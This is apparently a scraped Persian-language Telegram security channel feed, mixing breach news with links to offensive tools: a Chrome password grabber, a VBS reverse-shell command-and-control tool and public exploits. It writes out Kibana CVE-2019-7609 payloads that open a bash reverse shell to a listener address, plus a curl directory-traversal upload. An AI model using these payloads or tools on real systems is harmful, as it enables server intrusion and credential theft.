استخراج پسوردهای ذخیره شده در کروم بصورت clear text
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
GitHub
GitHub - priyankchheda/chrome_password_grabber: Get unencrypted 'Saved Password' from Google Chrome
Get unencrypted 'Saved Password' from Google Chrome - priyankchheda/chrome_password_grabber
POC: kibana < 6.6.0
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
Slides
Prototype Pollution in Kibana
Presentation I did for OWASP Poland Day, 14th October 2019
امنیت اطلاعات
POC: kibana < 6.6.0 .es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__ https://slides.com/securitymb/prototype…
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2019-7609
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
طبق شکایتی که از سوی سهامداران شرکت equifax تنظیم شده است مشخص شد این شرکت از نام کاربری و پسورد admin:admin برای دسترسی به پنل مدیریت پورتال حساسی استفاده میکرده است که این ضعف به هکرها کمک کرده است ضمن نفوذ به سرور و سرقت داده های کاربران، کلیدهای رمزگشایی پسوردهای رمزنگاری شده را نیز بدست آورند.
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
Yahoo Finance
Equifax used 'admin' as username and password for sensitive data: lawsuit
A class action lawsuit filed in January 2019 claims Equifax used "admin" as both password and username for a portal with sensitive information.
یک C&C عالی با فرمت VBS که در تمامی ویندوز ها پشتیبانی میشود.
https://github.com/bitsadmin/revbshell
#C&C
#ReverseShell
#VBS
@sec_nerd
https://github.com/bitsadmin/revbshell
#C&C
#ReverseShell
#VBS
@sec_nerd
GitHub
GitHub - bitsadmin/revbshell: ReVBShell - Reverse VBS Shell
ReVBShell - Reverse VBS Shell. Contribute to bitsadmin/revbshell development by creating an account on GitHub.
ابزار بروت فورس دایرکتوری های سرور یا سایت
https://github.com/stefanoj3/dirstalk
#fuzz
#web
#pentest
#bugbounty
@sec_nerd
https://github.com/stefanoj3/dirstalk
#fuzz
#web
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - stefanoj3/dirstalk: Modern alternative to dirbuster/dirb
Modern alternative to dirbuster/dirb. Contribute to stefanoj3/dirstalk development by creating an account on GitHub.
آسیب پذیری که در nhttpd کشف و اکسپلویت شده بود و هکر میتونست از طریق Directory Traversal به آسیب پذیری RCE برسه.
https://www.easyhack.in/2019/10/20/nostromo-httpd-remote-code-execution-cve-2019-16278/
#nhttpd
#rce
#webserver
@sec_nerd
https://www.easyhack.in/2019/10/20/nostromo-httpd-remote-code-execution-cve-2019-16278/
#nhttpd
#rce
#webserver
@sec_nerd
Easy Hack
Nostromo httpd Remote Code Execution | CVE-2019-16278 ~ Easy Hack
Nostromo is an open-source webserver written in C refer to nhttpd. Recently, in nostromo webserver security researcher sp0re has found 0day vulnerability. In 0day vulnerability is an attacker can execute remote code. Back in 2011 CVE-2011-0751, this vulnerability…
امنیت اطلاعات
CVE-2019-7609 .es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__ #kibana #elasticsearch #nosql #rce @sec_nerd
اسکریپت پایتون برای انجام این حمله
https://github.com/LandGrey/CVE-2019-7609/
#kibana
#elasticsearch
@sec_nerd
https://github.com/LandGrey/CVE-2019-7609/
#kibana
#elasticsearch
@sec_nerd
GitHub
GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts
exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts - LandGrey/CVE-2019-7609
برگه تقلبی در خصوص کشف آسیب پذیری هایی که در PHP به وجود می آیند.
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
GitHub
dustyfresh/PHP-vulnerability-audit-cheatsheet
This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function. - dustyfresh/P...
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
GitHub
GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043
Exploit for CVE-2019-11043. Contribute to neex/phuip-fpizdam development by creating an account on GitHub.
نحوه اکسپلویت کردن آسیب پذیری Directory Traversal با استفاده از curl
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
Security Boulevard
Sensitive US government and military travel details left exposed online
Significant amounts of sensitive data about employees of the US government military personnel data could now be in the public domain following its exposure in a data leak. Israeli security researchers Noam Rotem and Ran Locar discovered 179 GB of data on…
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
www.slideshare.net
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into …
امنیت اطلاعات
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation #web #XSS #XCS @sec_nerd
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
blog.malerisch.net
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
A blog about security research, web application security, software bugs and exploits.
ارسال بیش از ۵۰ هزار کاراکتر در پارامترهای POST
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
"Once a vulnerable target has been identified, attackers can send specially crafted requests by appending '?a=' in the URL to a vulnerable web server."
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd